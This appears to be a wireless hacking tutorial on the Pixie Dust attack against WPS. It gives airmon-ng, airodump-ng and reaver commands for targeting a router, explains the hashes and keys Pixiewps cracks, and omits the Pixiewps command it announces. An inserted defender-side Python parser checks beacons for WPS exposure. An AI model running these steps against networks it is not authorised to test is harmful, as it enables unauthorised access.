Pixie Dust Attack WPS with Reaver

In this tutorial we are going to do a Pixie Dust attack using Reaver 1.5.2, Aircrack-ng and Pixiewps. The Pixie Dust attack is an offline attack which exploits a WPS vulnerability. The tool, Pixiewps, is written in C and works with a modified version of Reaver. When a wireless router is vulnerable to this attack, retrieving the passphrase can be done in seconds.

A link to the list of Pixie Dust vulnerable routers is included at the bottom of this tutorial.

Pixie Dust Attack

Let's put the wifi interface in monitoring mode using:

    airmon-ng start wlan0

If necessary, kill the processes Kali is complaining about. For anyone getting the following error in Kali Linux 2.0 Sana:

    [X] ERROR: Failed to open 'wlan0mon' for capturing

Try the following as a solution:


1. Put the device in monitor mode:

    airmon-ng start wlan0

2. A monitoring interface will be started on wlan0mon.

3. Use iwconfig to check if the interface MODE is in managed mode; if so, change it to monitor instead of managed with the following commands:

    ifconfig wlan0mon down
    iwconfig wlan0mon mode monitor
    ifconfig wlan0mon up

4. Run iwconfig again to check that the mode is now monitor mode.

5. Start airodump-ng to get the BSSID, MAC address and channel of our target:

    airodump-ng wlan0mon


    airodump-ng -i wlan0mon

Now pick the target and use the BSSID and the channel for Reaver:

    reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

We need the PKE, PKR, E-Hash1 & E-Hash2, E-Nonce / R-Nonce and the AuthKey from Reaver to use for Pixiewps. Now start Pixiewps with the following arguments:

Components:
– E-Hash1 is a hash in which we brute force the first half of the WPS PIN.
– E-Hash2 is a hash in which we brute force the second half of the WPS PIN.
– HMAC is a function that hashes all the data in parentheses. The function is HMAC-SHA-256.
– PSK1 is the first half of the router's WPS PIN (10,000 possibilities).
– PSK2 is the second half of the router's WPS PIN (1,000 or 10,000 possibilities, depending on whether we want to compute the checksum. We just do 10,000 because it makes no time difference and it's just easier.)
– PKE is the Public Key of the Enrollee (used to verify the legitimacy of a WPS exchange and prevent replays).
– PKR is the Public Key of the Registrar (used to verify the legitimacy of a WPS exchange and prevent replays).

This router does not seem to be vulnerable to the Pixie Dust attack.
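From the defender's side, the first check against this attack is whether your own access points advertise WPS at all, whether they report AP Setup Locked, and what manufacturer and model they announce (to compare with the vulnerable-router database linked below). The Python below is an added example, not code from this tutorial, Reaver or Pixiewps: it parses the WPS information element (vendor-specific IE, OUI 00:50:F2 type 4) out of a beacon's tagged parameters. Attribute IDs are from the Wi-Fi Simple Configuration specification; the beacon bytes and the vendor/model names are constructed sample input.

```python
import struct
OUI_WPS = b"\x00\x50\xf2\x04"  # Microsoft OUI + OUI type 4 marks the WPS IE
# WSC attribute IDs (Wi-Fi Simple Configuration spec), 16-bit big-endian
ATTR_WPS_STATE = 0x1044           # 1 = not configured, 2 = configured
ATTR_DEVICE_PASSWORD_ID = 0x1012  # 0x0000 = default (PIN), 0x0004 = push button
ATTR_AP_SETUP_LOCKED = 0x1057     # 1 = AP currently refuses external PIN registrars
ATTR_MANUFACTURER = 0x1021
ATTR_MODEL_NAME = 0x1023

def parse_wsc_attributes(data):
    """Decode the type/length/value attribute list inside a WPS IE."""
    attrs, i = {}, 0
    while i + 4 <= len(data):
        atype, alen = struct.unpack(">HH", data[i:i + 4])
        attrs[atype] = data[i + 4:i + 4 + alen]
        i += 4 + alen
    return attrs

def parse_wps_ie(tagged_params):
    """Walk a beacon's tagged parameters; return WPS attributes or None."""
    i = 0
    while i + 2 <= len(tagged_params):
        eid, elen = tagged_params[i], tagged_params[i + 1]
        body = tagged_params[i + 2:i + 2 + elen]
        i += 2 + elen
        if eid == 0xDD and body.startswith(OUI_WPS):
            return parse_wsc_attributes(body[len(OUI_WPS):])
    return None

def wps_exposure(tagged_params):
    """Summarise what the AP broadcasts about its WPS setup."""
    attrs = parse_wps_ie(tagged_params)
    if attrs is None:
        return {"wps_advertised": False}
    pw_id = attrs.get(ATTR_DEVICE_PASSWORD_ID)  # absent in many beacons -> None
    return {
        "wps_advertised": True,
        "configured": attrs.get(ATTR_WPS_STATE) == b"\x02",
        "setup_locked": attrs.get(ATTR_AP_SETUP_LOCKED) == b"\x01",
        "pin_mode": None if pw_id is None else struct.unpack(">H", pw_id)[0] == 0,
        "manufacturer": attrs.get(ATTR_MANUFACTURER, b"").decode("utf-8", "replace"),
        "model": attrs.get(ATTR_MODEL_NAME, b"").decode("utf-8", "replace"),
    }
def _attr(atype, value):  # builds one TLV for the constructed sample below
    return struct.pack(">HH", atype, len(value)) + value
# Constructed sample beacon: SSID IE, then a WPS IE from a fictional "ExampleCorp WR-1000"
_WPS_BODY = (OUI_WPS + _attr(ATTR_WPS_STATE, b"\x02") + _attr(ATTR_AP_SETUP_LOCKED, b"\x00")
             + _attr(ATTR_DEVICE_PASSWORD_ID, b"\x00\x00")
             + _attr(ATTR_MANUFACTURER, b"ExampleCorp") + _attr(ATTR_MODEL_NAME, b"WR-1000"))
SAMPLE_BEACON_TAGS = b"\x00\x07TestNet" + bytes([0xDD, len(_WPS_BODY)]) + _WPS_BODY
```

Feed wps_exposure() the tagged-parameter bytes of a captured beacon (everything after the 12-byte fixed beacon header); an AP that reports configured, not locked and PIN mode is the one to fix by disabling WPS PIN mode.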

Avoiding Reaver router lock-out with Pixiedust loop

When using the -P (Pixiedust loop) option, Reaver goes into a loop mode that breaks the WPS protocol by not using the M4 message, to avoid lockouts. This option can only be used for PixieHash collecting to use with Pixiewps.

Thanks for watching and please subscribe for more hacking tutorials :)

More information:
– Database with routers vulnerable to the Pixie Dust attack:
– Pixie WPS on GitHub:
– Modified Reaver with Pixie Dust attack:

If you're interested in learning more about WiFi hacking and wireless in general, you can follow any of these online courses:

Online Hacking Courses
– Learn Wi-Fi Hacking/Penetration Testing From Scratch: this course contains 50 videos to learn practical attacks to test the security of Wi-Fi and wired networks from scratch using Linux.
– Learn Penetration Testing using Android From Scratch: 40+ videos to learn how to use Android to test the security of networks and computer systems.